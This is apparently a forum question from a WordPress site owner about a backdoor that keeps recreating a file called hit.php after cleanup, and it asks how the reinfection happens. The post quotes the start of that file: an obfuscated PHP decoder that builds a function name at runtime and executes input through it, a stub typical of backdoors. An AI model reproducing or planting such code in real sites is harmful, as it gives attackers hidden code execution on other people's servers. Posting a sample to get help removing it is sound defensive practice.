Malware

How to completely cure a WordPress site from the backdoor cSR virus?

A virus was noticed on the WordPress site, the code of which managed to multiply in the files: wp-config.php, index.php, and also created other files in different folders.
As a result, what was done:
1) Using the Wordfence Security plugin scanner, they found all virus files and deleted them
2) Completely overwrote all WordPress files
3) Installed and configured iThemes Security properly
4) Changed the password on FTP, changed passwords in the WP admin panel
Here for the third day, the problem is this:
- a hit.php file is created in the root of the site, with the following initial content (the file is long, I don’t insert everything):

<?php

          function r6ZVq($DxfSB3xgkeK)
{
$yWj2kmO='jbJPz';
$oeUU7hsO='ZTV1IH';

$DxfSB3xgkeK=base64_decode($DxfSB3xgkeK);

$yHBPZX=17;
$heUw1F=(1130+1433-2352);

$KMyJBhO=(606-1191+585);
            $IZk1uAY='';

while(true)
    {

if($KMyJBhO==strlen($DxfSB3xgkeK))

break;
    elseif($KMyJBhO%(-1007+152+857)==0)
          $HD5ZzPdib=(ord($DxfSB3xgkeK[$KMyJBhO])-$yHBPZX)%(929+1366-2039);
          else
        $HD5ZzPdib=ord($DxfSB3xgkeK[$KMyJBhO])^$heUw1F;
$IZk1uAY.=chr($HD5ZzPdib);
          $KMyJBhO+=1;
}
        return $IZk1uAY;
}

        class ItuCN4Hc

{

          static public function qmUFL($bRS8AA)

{
  $D5QnuExrvE5='YPwT9Scmfvv';
$UB6Ai=r6ZVq("dquFtn+gerx/jH28crd2tw==");
  return $UB6Ai($bRS8AA);
}

Wordfence Security scolds him like this:

What else needs to be done? How does this virus manage to create this file? Where to look?